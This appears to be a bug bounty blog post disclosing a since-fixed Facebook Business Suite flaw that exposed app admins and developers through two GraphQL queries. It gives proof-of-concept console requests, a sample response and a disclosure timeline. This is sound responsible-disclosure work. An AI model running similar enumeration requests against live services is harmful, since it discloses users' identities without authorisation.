Disclosing assigned users of any facebook applications connected to business account

2 min readApr 7, 2023

During the Mid-April 2021, I found a very new looking UI of Facebook Business Suite in one of my test facebook account. So, within a second I found new business assets sections added within it.

While analyzing every requests and responses from network tab of dev tools, I found two graphql queries named “BizKitSettingsAssetAssignedPeopleModalQuery ” and “ BizKitSettingsAssetToUserConnectionListPaginationQuery” were fetching the admin’s list of my page connected to business account. At the time of reporting, call for facebook pages was secured but was vulnerable for the asset type apps.

Based on the given input for the targeted app and linked business id, it was possible to disclose NonBusinessScopedPermittedUser of targeted facebook app.

Proof of concept

Send the GraphQL requests as an AJAX call in the console window.

BizKitSettingsAssetAssignedPeopleModalQuery:

new AsyncRequest('api/graphql/').setData({doc_id:3863660693680109,variables:'{"assetID":"AppID","businessID":"linked_businessID"}'}).send()

BizKitSettingsAssetToUserConnectionListPaginationQuery:

new AsyncRequest('api/graphql/').setData({doc_id:5596978093660601,variables:'{"assetID":"AppID","assetPermissionAccessType":null,"businessID":"linked_businessID","count":100,"cursor":null,"searchTerm":null,"id":"AppID"}'}).send()

Same responses from above both queries:

{
  "data": {
    "asset": {
      "__typename": "Application",
      "__isBusinessConnectedObjectWithPermittedUsers": "Application",
      "assigned_users": {
        "edges": [
          {
            "node": {
              "__typename": "NonBusinessScopedPermittedUser",
              "__isPermittedUser": "NonBusinessScopedPermittedUser",
              "name": "Facebook Name",
              "__module_operation_BizKitSettingsAssetToUserConnectionListItem_user": {
                "__dr": "BizKitSettingsAssetToNonBusinessScopedUserConnectionListItem_user$normalization.graphql"
              },
              "__module_component_BizKitSettingsAssetToUserConnectionListItem_user": {
                "__dr": "BizKitSettingsAssetToNonBusinessScopedUserConnectionListItem.react"
              },
              "id": "FBID"
            },
            "cursor": null
          }
        ],
        "page_info": {
          "end_cursor": "end_cursor",
          "has_next_page": true
        }
      },
      "__isBusinessObjectRenderedInUI": "Application",
      "assetID": "AppID",
      "assetName": "Facebook App Name",
      "assetPicture": "CDN_URL",
      "assetType": "APP",
      "__isNode": "Application",
      "id": "AppID",
      "businessAssetType": "APP"
    }
  },
  "extensions": {
    "is_final": true
  }
}

Impact

This could have let a malicious user to disclose any app admins/developers(NonBusinessScopedPermittedUser) list connected to business account.

Timeline

22 Apr, 2021— Report Sent to Facebook.
22 Apr, 2021 — Triaged after 4 hours of submission.
15 July 2021 — Incomplete fix by Facebook.
26 Aug, 2021 — Bounty Awarded by Facebook.
20 Jan, 2022 — Complete fix by Facebook.
27 Jan, 2022 —Double bounty awarded by Facebook for incomplete fix with delay payout bonus.

After multiple duplicates and informative reports, this report turned out to be my first bounty reward from Facebook.

You know that feeling when you get your first bounty ?💰️

Your heart starts racing. You keep going back, chasing that feeling over and over again.🚀

Thanks for reading my write-up 🤗 Happy Hacking 🎭️

Thanks & best regards,
Gtm Mänôz

Linkedin: https://linkedin.com/in/gtm0x01

Twitter: https://www.twitter.com/gtm0x01/

Facebook: https://www.facebook.com/gtm0x01

Instagram: https://www.instagram.com/gtm0x01/